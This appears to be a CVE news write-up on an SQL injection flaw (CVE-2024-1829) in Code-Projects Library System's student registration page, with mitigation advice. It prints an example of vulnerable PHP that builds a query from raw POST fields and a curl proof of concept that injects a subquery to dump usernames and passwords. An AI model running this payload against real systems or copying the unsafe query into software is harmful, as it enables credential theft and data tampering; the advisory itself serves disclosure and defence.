CVE CyberSecurity Database News

CVE-2024-1829 - Critical SQL Injection in Code-Projects Library System 1. Explained

Poster -

A dangerous SQL injection vulnerability was found in Code-Projects Library System 1. and has the potential to compromise libraries running this open source platform. Assigned the identifier CVE-2024-1829 (also referenced as VDB-254617), this flaw makes it alarmingly easy for attackers to tamper with the library’s backend database — possibly leaking, modifying, or even erasing data.

Product: Code-Projects Library System 1.

- Affected File: Source/librarian/user/student/registration.php

Impact: Critical — can lead to full database compromise

- Discoverer/Disclosure: Publicly disclosed; exploit details are available

Let's break things down simply and walk through what this means, how it works, and how it's exploited.

How Does CVE-2024-1829 Work?

This vulnerability exists in the student registration page (registration.php). The script accepts multiple POST parameters from the user — notably email, regno, phone, and username. These are taken directly from user input and incorporated into SQL queries without proper sanitization or prepared statements.

*In plain English:* Any attacker on the internet can send a specially crafted request and trick the library system into running dangerous SQL commands of their choosing.

Here's a simplified segment of what the problematic PHP code might look like in registration.php

<?php
// ... (Other initialization code)

// Get user submitted fields (unsafe)
$email = $_POST['email'];
$regno = $_POST['regno'];
$phone = $_POST['phone'];
$username = $_POST['username'];

// Here comes the vulnerable SQL query:
$sql = "INSERT INTO students (email, regno, phone, username) VALUES ('$email', '$regno', '$phone', '$username')";
mysqli_query($conn, $sql); // $conn is database connection
?>

Notice that user-supplied data ($email, $regno, etc.) are being stuffed directly into an SQL query without any validation. This is a textbook example of SQL Injection.

How Can an Attacker Exploit This?

An attacker needs only to submit a registration with harmful SQL code in fields like email or regno. Here's a simple proof-of-concept (PoC) to dump user data from the database using the regno field:

Sample Exploit: Using curl

curl -X POST http://TARGET/Source/librarian/user/student/registration.php \
  -d "email=foo@bar.com" \
  -d "regno=abc', (SELECT GROUP_CONCAT(username, ':', password) FROM users)-- -" \
  -d "phone=12345" \
  -d "username=testuser"

*What this does:* The attacker inserts an SQL query via the regno field, attempting to join in results from the users table. If successful, the server may expose all usernames and password hashes in its response — or, at worst, modify or delete data.

Yes — here are some public advisories and resources

- Vuldb Advisory (VDB-254617)
- NVD Entry (when available)
- GitHub - code-projects/Library-Management-System (project homepage)

If you run Code-Projects Library System 1., immediate action is required!

- Do not trust user input: Never put user-supplied data directly into SQL. Use prepared statements instead.

Sanitize and validate ALL inputs.

If possible, restrict access to affected pages until a patch can be applied.

Closing Thoughts

CVE-2024-1829 is a classic, dangerous SQL injection that puts libraries and their users at risk. If your organization uses Code-Projects Library System, you must act now. Check your installation, patch your code, and always use safe database coding practices!

For detailed mitigation steps, official responses, or to report a compromise, visit the project’s GitHub page or trusted advisories above.

*Stay safe, patch fast, and share this with your library or IT friends who might be affected!*

References

- Vuldb Advisory: VDB-254617
- NVD (CVE-2024-1829)
- Code-Projects Library System GitHub

Timeline

Published on: 02/23/2024 18:15:50 UTC
Last modified on: 03/21/2024 02:51:46 UTC